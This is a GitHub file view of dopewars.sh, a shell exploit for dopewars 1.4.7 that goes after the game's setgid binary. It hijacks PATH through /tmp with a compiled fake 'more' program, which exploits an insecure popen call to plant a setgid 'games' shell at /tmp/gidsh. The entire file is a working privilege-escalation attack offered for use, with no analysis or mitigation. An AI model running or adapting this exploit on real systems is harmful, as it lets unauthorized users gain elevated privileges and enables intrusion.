-
Notifications
You must be signed in to change notification settings - Fork 0
/
dopewars.sh
29 lines (28 loc) · 935 Bytes
/
dopewars.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
#!/bin/sh
# dopewars.sh(1.4.7): shell script by Vade79->[email protected]. gives gid=games.
# insecure use of a popen call while setgid isn't good in any situation.
DOPEWARS=`which dopewars`
if [ "$DOPEWARS" ];
then echo "[*] dopewars binary found: $DOPEWARS."
else echo "[!] dopewars binary was not found, aborted.";exit
fi
CHECK=`ls -l $DOPEWARS | grep sr-`
if [ "$CHECK" ];
then echo "[*] dopewars found to be setgid, proceeding."
else echo "[!] dopewars NOT found to be setgid, aborted.";exit
fi
PATH=/tmp:$PATH
cp /bin/sh /tmp/gidsh
echo 'main(){system("chgrp games /tmp/gidsh;chmod 2755 /tmp/gidsh");}'>/tmp/more.c
cc /tmp/more.c -o /tmp/more
cat <<X>/tmp/dopecmds
help
quit
X
dopewars -s</tmp/dopecmds 1>/dev/null 2>&1
rm -f /tmp/more* /tmp/dopecmds
CHECK=`ls -l /tmp/gidsh | grep sr-`
if [ "$CHECK" ];
then echo "[*] success, setgid shell is in: /tmp/gidsh."
else echo "[!] failed, the setgid shell doesn't exist."
fi